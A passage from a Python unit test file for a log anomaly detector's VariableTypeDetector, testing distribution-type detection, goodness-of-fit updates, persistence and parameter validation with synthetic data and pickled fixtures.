0, -1): stat_data = bytes(str(i * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["desc", "float"], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b"True" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> nor for nor_data in nor_data_list[update:3*update]: nor_data = str(nor_data) encoded_data = str(nor_data).encode() log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, nor_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue(result[0] == "nor" or "nor" in [distr[0] for distr in pos_distr], (init, update, result)) # nor -> beta1 for beta1_data in beta1_data_list[:2*update]: beta1_data = str(beta1_data) encoded_data = beta1_data.encode() log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, beta1_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue((result[0] == "beta" and result[-1] == 1) or "beta1" in [distr[0]+str(distr[-1]) for distr in pos_distr], (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b"True" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for _ in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> unq vtd.test_gof_int = False unq_data_list = [bytes(str(i), "utf-8") for i in range(2*update)] random.shuffle(unq_data_list) for unq_data in unq_data_list: log_atom = LogAtom(unq_data, ParserMatch(MatchElement(self.path, unq_data, unq_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("unq", result[0], (init, update, result)) def test7update_continuous_VT(self): """ This unittest tests the s_gof_test method. It uses randomised datasets, which can be printed in the terminal. Every distribution has generated 30*300 Datasets and var_ev = 0, var_var = 1. """ # Number of execution of the tested function iterations = 20 # Size of the initial datasample dataset_size_ini = 100 # Size of the update datasample dataset_size_upd = 50 # Significance level significance_niveau = 0.05 # load data with open("unit/data/vtd_data/uni_data_test7", "rb") as f: [uni_data_list_ini, uni_data_list_upd, uni_result_shapes_ks, uni_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/nor_data_test7", "rb") as f: [nor_data_list_ini, nor_data_list_upd, nor_result_shapes_ks, nor_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta1_data_test7", "rb") as f: [beta1_data_list_ini, beta1_data_list_upd, beta1_result_shapes_ks, beta1_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta2_data_test7", "rb") as f: [beta2_data_list_ini, beta2_data_list_upd, beta2_result_shapes_ks, beta2_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta3_data_test7", "rb") as f: [beta3_data_list_ini, beta3_data_list_upd, beta3_result_shapes_ks, beta3_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta4_data_test7", "rb") as f: [beta4_data_list_ini, beta4_data_list_upd, beta4_result_shapes_ks, beta4_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta5_data_test7", "rb") as f: [beta5_data_list_ini, beta5_data_list_upd, beta5_result_shapes_ks, beta5_result_shapes_cm] = pickle.load(f) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd_ks = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size_ini, num_update=dataset_size_upd, gof_alpha=significance_niveau, used_gof_test="KS") vtd_cm = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size_ini, num_update=dataset_size_upd, gof_alpha=significance_niveau, used_gof_test="CM") result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(uni_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "uni": variable_type_ini = variable_type_ini[:-1] elif "uni" in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "uni": variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[uni_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(uni_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "uni": variable_type_ini = variable_type_ini[:-1] elif "uni" in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "uni": variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[uni_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == uni_result_shapes_ks) self.assertTrue(result_list_cm == uni_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(nor_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "nor": variable_type_ini = variable_type_ini[:-1] elif "nor" in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "nor": variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[nor_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(nor_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "nor": variable_type_ini = variable_type_ini[:-1] elif "nor" in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "nor": variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[nor_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == nor_result_shapes_ks) self.assertTrue(result_list_cm == nor_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta1_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 1: variable_type_ini = variable_type_ini[:-1] elif "beta1" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 1: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta1_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta1_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 1: variable_type_ini = variable_type_ini[:-1] elif "beta1" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 1: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta1_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta1_result_shapes_ks) self.assertTrue(result_list_cm == beta1_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta2_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 2: variable_type_ini = variable_type_ini[:-1] elif "beta2" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 2: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta2_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta2_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 2: variable_type_ini = variable_type_ini[:-1] elif "beta2" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 2: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta2_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta2_result_shapes_ks) self.assertTrue(result_list_cm == beta2_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta3_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 3: variable_type_ini = variable_type_ini[:-1] elif "beta3" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 3: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta3_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta3_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 3: variable_type_ini = variable_type_ini[:-1] elif "beta3" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 3: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta3_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta3_result_shapes_ks) self.assertTrue(result_list_cm == beta3_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta4_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 4: variable_type_ini = variable_type_ini[:-1] elif "beta4" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 4: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta4_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta4_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 4: variable_type_ini = variable_type_ini[:-1] elif "beta4" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 4: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta4_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta4_result_shapes_ks) self.assertTrue(result_list_cm == beta4_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta5_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 5: variable_type_ini = variable_type_ini[:-1] elif "beta5" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 5: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta5_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta5_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 5: variable_type_ini = variable_type_ini[:-1] elif "beta5" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 5: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta5_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta5_result_shapes_ks) self.assertTrue(result_list_cm == beta5_result_shapes_cm) def test8do_timer(self): """Test if the do_timer method is implemented properly.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd) t = time.time() vtd.next_persist_time = t + 400 self.assertEqual(vtd.do_timer(t + 200), 200) self.assertEqual(vtd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(vtd.do_timer(t + 999), 1) self.assertEqual(vtd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test9persistence(self): """Test the do_persist and load_persistence_data methods.""" # load data with open("unit/data/vtd_data/uni_data_test6", "rb") as f: uni_data_list = pickle.load(f) init = 100 update = 100 etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b"True" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> static for i in range(update): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> uni for uni_data in uni_data_list[2 * update:4 * update]: uni_data = str(uni_data) encoded_data = uni_data.encode() log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, uni_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue(result[0] == "uni" or "uni" in [distr[0] for distr in pos_distr], (init, update, result)) # uni -> others for i in range(update): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["others", 0], result, (init, update, result)) # others -> d for i in range(update): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("d", result[0], (init, update, result)) self.assertEqual(vtd.var_type, [[['d', [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0],[0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05], 100]]]) self.assertEqual(vtd.alternative_distribution_types, [[[]]]) self.assertEqual(vtd.var_type_history_list, [[[[0, 0, 1, 0, 1, 0], [1, 1, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0]], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]], [[0, 0, 0, -0.15555384791577725, 0, 0], [0, 0, 0, 0.5762564151199925, 0, 0]]]]]) self.assertEqual(vtd.var_type_history_list_reference, []) self.assertEqual(vtd.failed_indicators, []) self.assertEqual(vtd.distr_val, [[[]]]) vtd.do_persist() with open(vtd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[[["string:d", [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0], [0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05], 100]]], [[[]]], [[[[0, 0, 1, 0, 1, 0], [1, 1, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0]], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]], [[0, 0, 0, -0.15555384791577725, 0, 0], [0, 0, 0, 0.5762564151199925, 0, 0]]]]], [], [], [[[]]]]') vtd.load_persistence_data() self.assertEqual(vtd.var_type, [[['d', [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0],[0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05], 100]]]) self.assertEqual(vtd.alternative_distribution_types, [[[]]]) self.assertEqual(vtd.var_type_history_list, [[[[0, 0, 1, 0, 1, 0], [1, 1, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0]], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]], [[0, 0, 0, -0.15555384791577725, 0, 0], [0, 0, 0, 0.5762564151199925, 0, 0]]]]]) self.assertEqual(vtd.var_type_history_list_reference, []) self.assertEqual(vtd.failed_indicators, []) self.assertEqual(vtd.distr_val, [[[]]]) other = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) self.assertEqual(vtd.var_type, other.var_type) self.assertEqual(vtd.alternative_distribution_types, other.alternative_distribution_types) self.assertEqual(vtd.var_type_history_list, other.var_type_history_list) self.assertEqual(vtd.var_type_history_list_reference, other.var_type_history_list_reference) self.assertEqual(vtd.failed_indicators, other.failed_indicators) self.assertEqual(vtd.distr_val, other.distr_val) def test10validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, ["default"], etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, None, etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, "", etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, b"Default", etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, True, etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 123, etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 123.3, etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, {"id": "Default"}, etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, (), etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, set(), etd) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], 123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/path"]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=None) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test="SomethingElse") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test="KS") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_gof_test="CM") self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=1.1) self.assertRaises(TypeError, 